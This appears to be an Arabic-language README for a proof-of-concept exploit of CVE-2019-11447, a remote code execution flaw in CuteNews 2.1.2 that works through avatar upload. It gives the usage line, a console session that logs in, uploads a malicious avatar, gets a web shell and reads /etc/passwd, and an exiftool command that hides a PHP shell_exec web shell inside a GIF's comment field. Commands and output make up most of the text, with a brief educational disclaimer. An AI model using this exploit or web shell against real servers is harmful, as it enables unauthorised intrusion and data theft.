
CuteNews 2.1.2 - CVE-2019-11447 إثبات المفهوم
CuteNews 2.1.2 - CVE-2019-11447 إثبات المفهوم
إثبات المفهوم بواسطة CRFSlick، تم اكتشافها بواسطة AkkuS <Özkan Mustafa Akkuş>
تم اكتشاف مشكلة في CutePHP CuteNews 2.1.2. يمكن للمهاجم اختراق الخادم من خلال عملية رفع الصورة الرمزية في منطقة الملف الشخصي عبر حقل avatar_file إلى index.php?mod=main&opt=personal. لا يوجد تحكم فعال في $imgsize في /core/modules/dashboard.php. يمكن تغيير محتوى رأس الملف ويمكن تجاوز التحكم لتنفيذ التعليمات البرمجية. (يمكن للمهاجم استخدام رأس GIF لهذا الغرض).
Usage:
CVE-2019-1144.py <username> <password> <base uri / login page>
Example:
CVE-2019-1144.py admin p4ssw0rd http://192.168.1.19/CuteNews/index.php
┌──(slick㉿kali)-[~/CVE-2019-11447-POC]
└─$ python3 CVE-2019-11447.py admin p4ssw0rd http://192.168.1.19/CuteNews/index.php
-.-. --- --- .-.. .... ....- -..- --- .-. -... .- -. -. . .-.
[*] Detected version 'CuteNews 2.1.2'
[*] Grabbing session cookie
[*] Logging in as admin:p4ssw0rd
[+] Login Success!
[*] Grabbing __signature_key and __signature_dsi needed for pofile update request
[+] __signature_key: 45ad06a9fc89f75e7ef046a11079c33d-admin
[+] __signature_dsi: 71e41d6500f2dc51d0606f64539f84b1
[*] Uploading evil avatar... Done!
[*] Validating that the file was uploaded... Yup!
[+] http://192.168.1.19/CuteNews/uploads/avatar_admin_5629.php?cmd=<cmd>
[*] Looks like everything went smoothly, lets see if we have RCE!
[*] Keep in mind that this shell is limited, no STDERR
$> whoami
www-data
$> cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
تم الحصول على الـ GIF الخبيث من الإنترنت ثم تعديله باستخدام exiftool لإدراج PHP المطلوبة
┌──(slick㉿kali)-[~/CVE-2019-11447-POC]
└─$ exiftool -Comment='<?php echo "'"\n\ndGhpc3dlYnNoZWxsb3V0cHV0c3RhcnRzaGVyZQ==\n\n\n"'"; echo shell_exec($_GET["'"cmd"'"]); echo "'"\n\ndGhpc3dlYnNoZWxsb3V0cHV0ZW5kc2hlcmU=\n\n"'";?>' sad.gif
سيُظهر Exiftool البيانات الوصفية للصورة حيث ستجد كود PHP الموضوع داخل التعليق
┌──(slick㉿kali)-[~/CVE-2019-11447-POC]
└─$ exiftool sad.gif
ExifTool Version Number : 12.05
File Name : sad.gif
...
Comment : <?php echo "\n\ndGhpc3dlYnNoZWxsb3V0cHV0c3R...
هذا المشروع مخصص للأغراض التعليمية فقط ولا يمكن استخدامه لانتهاك القانون أو لتحقيق مكاسب شخصية. المؤلف لهذا المشروع غير مسؤول عن أي ضرر محتمل ناتج عن المواد.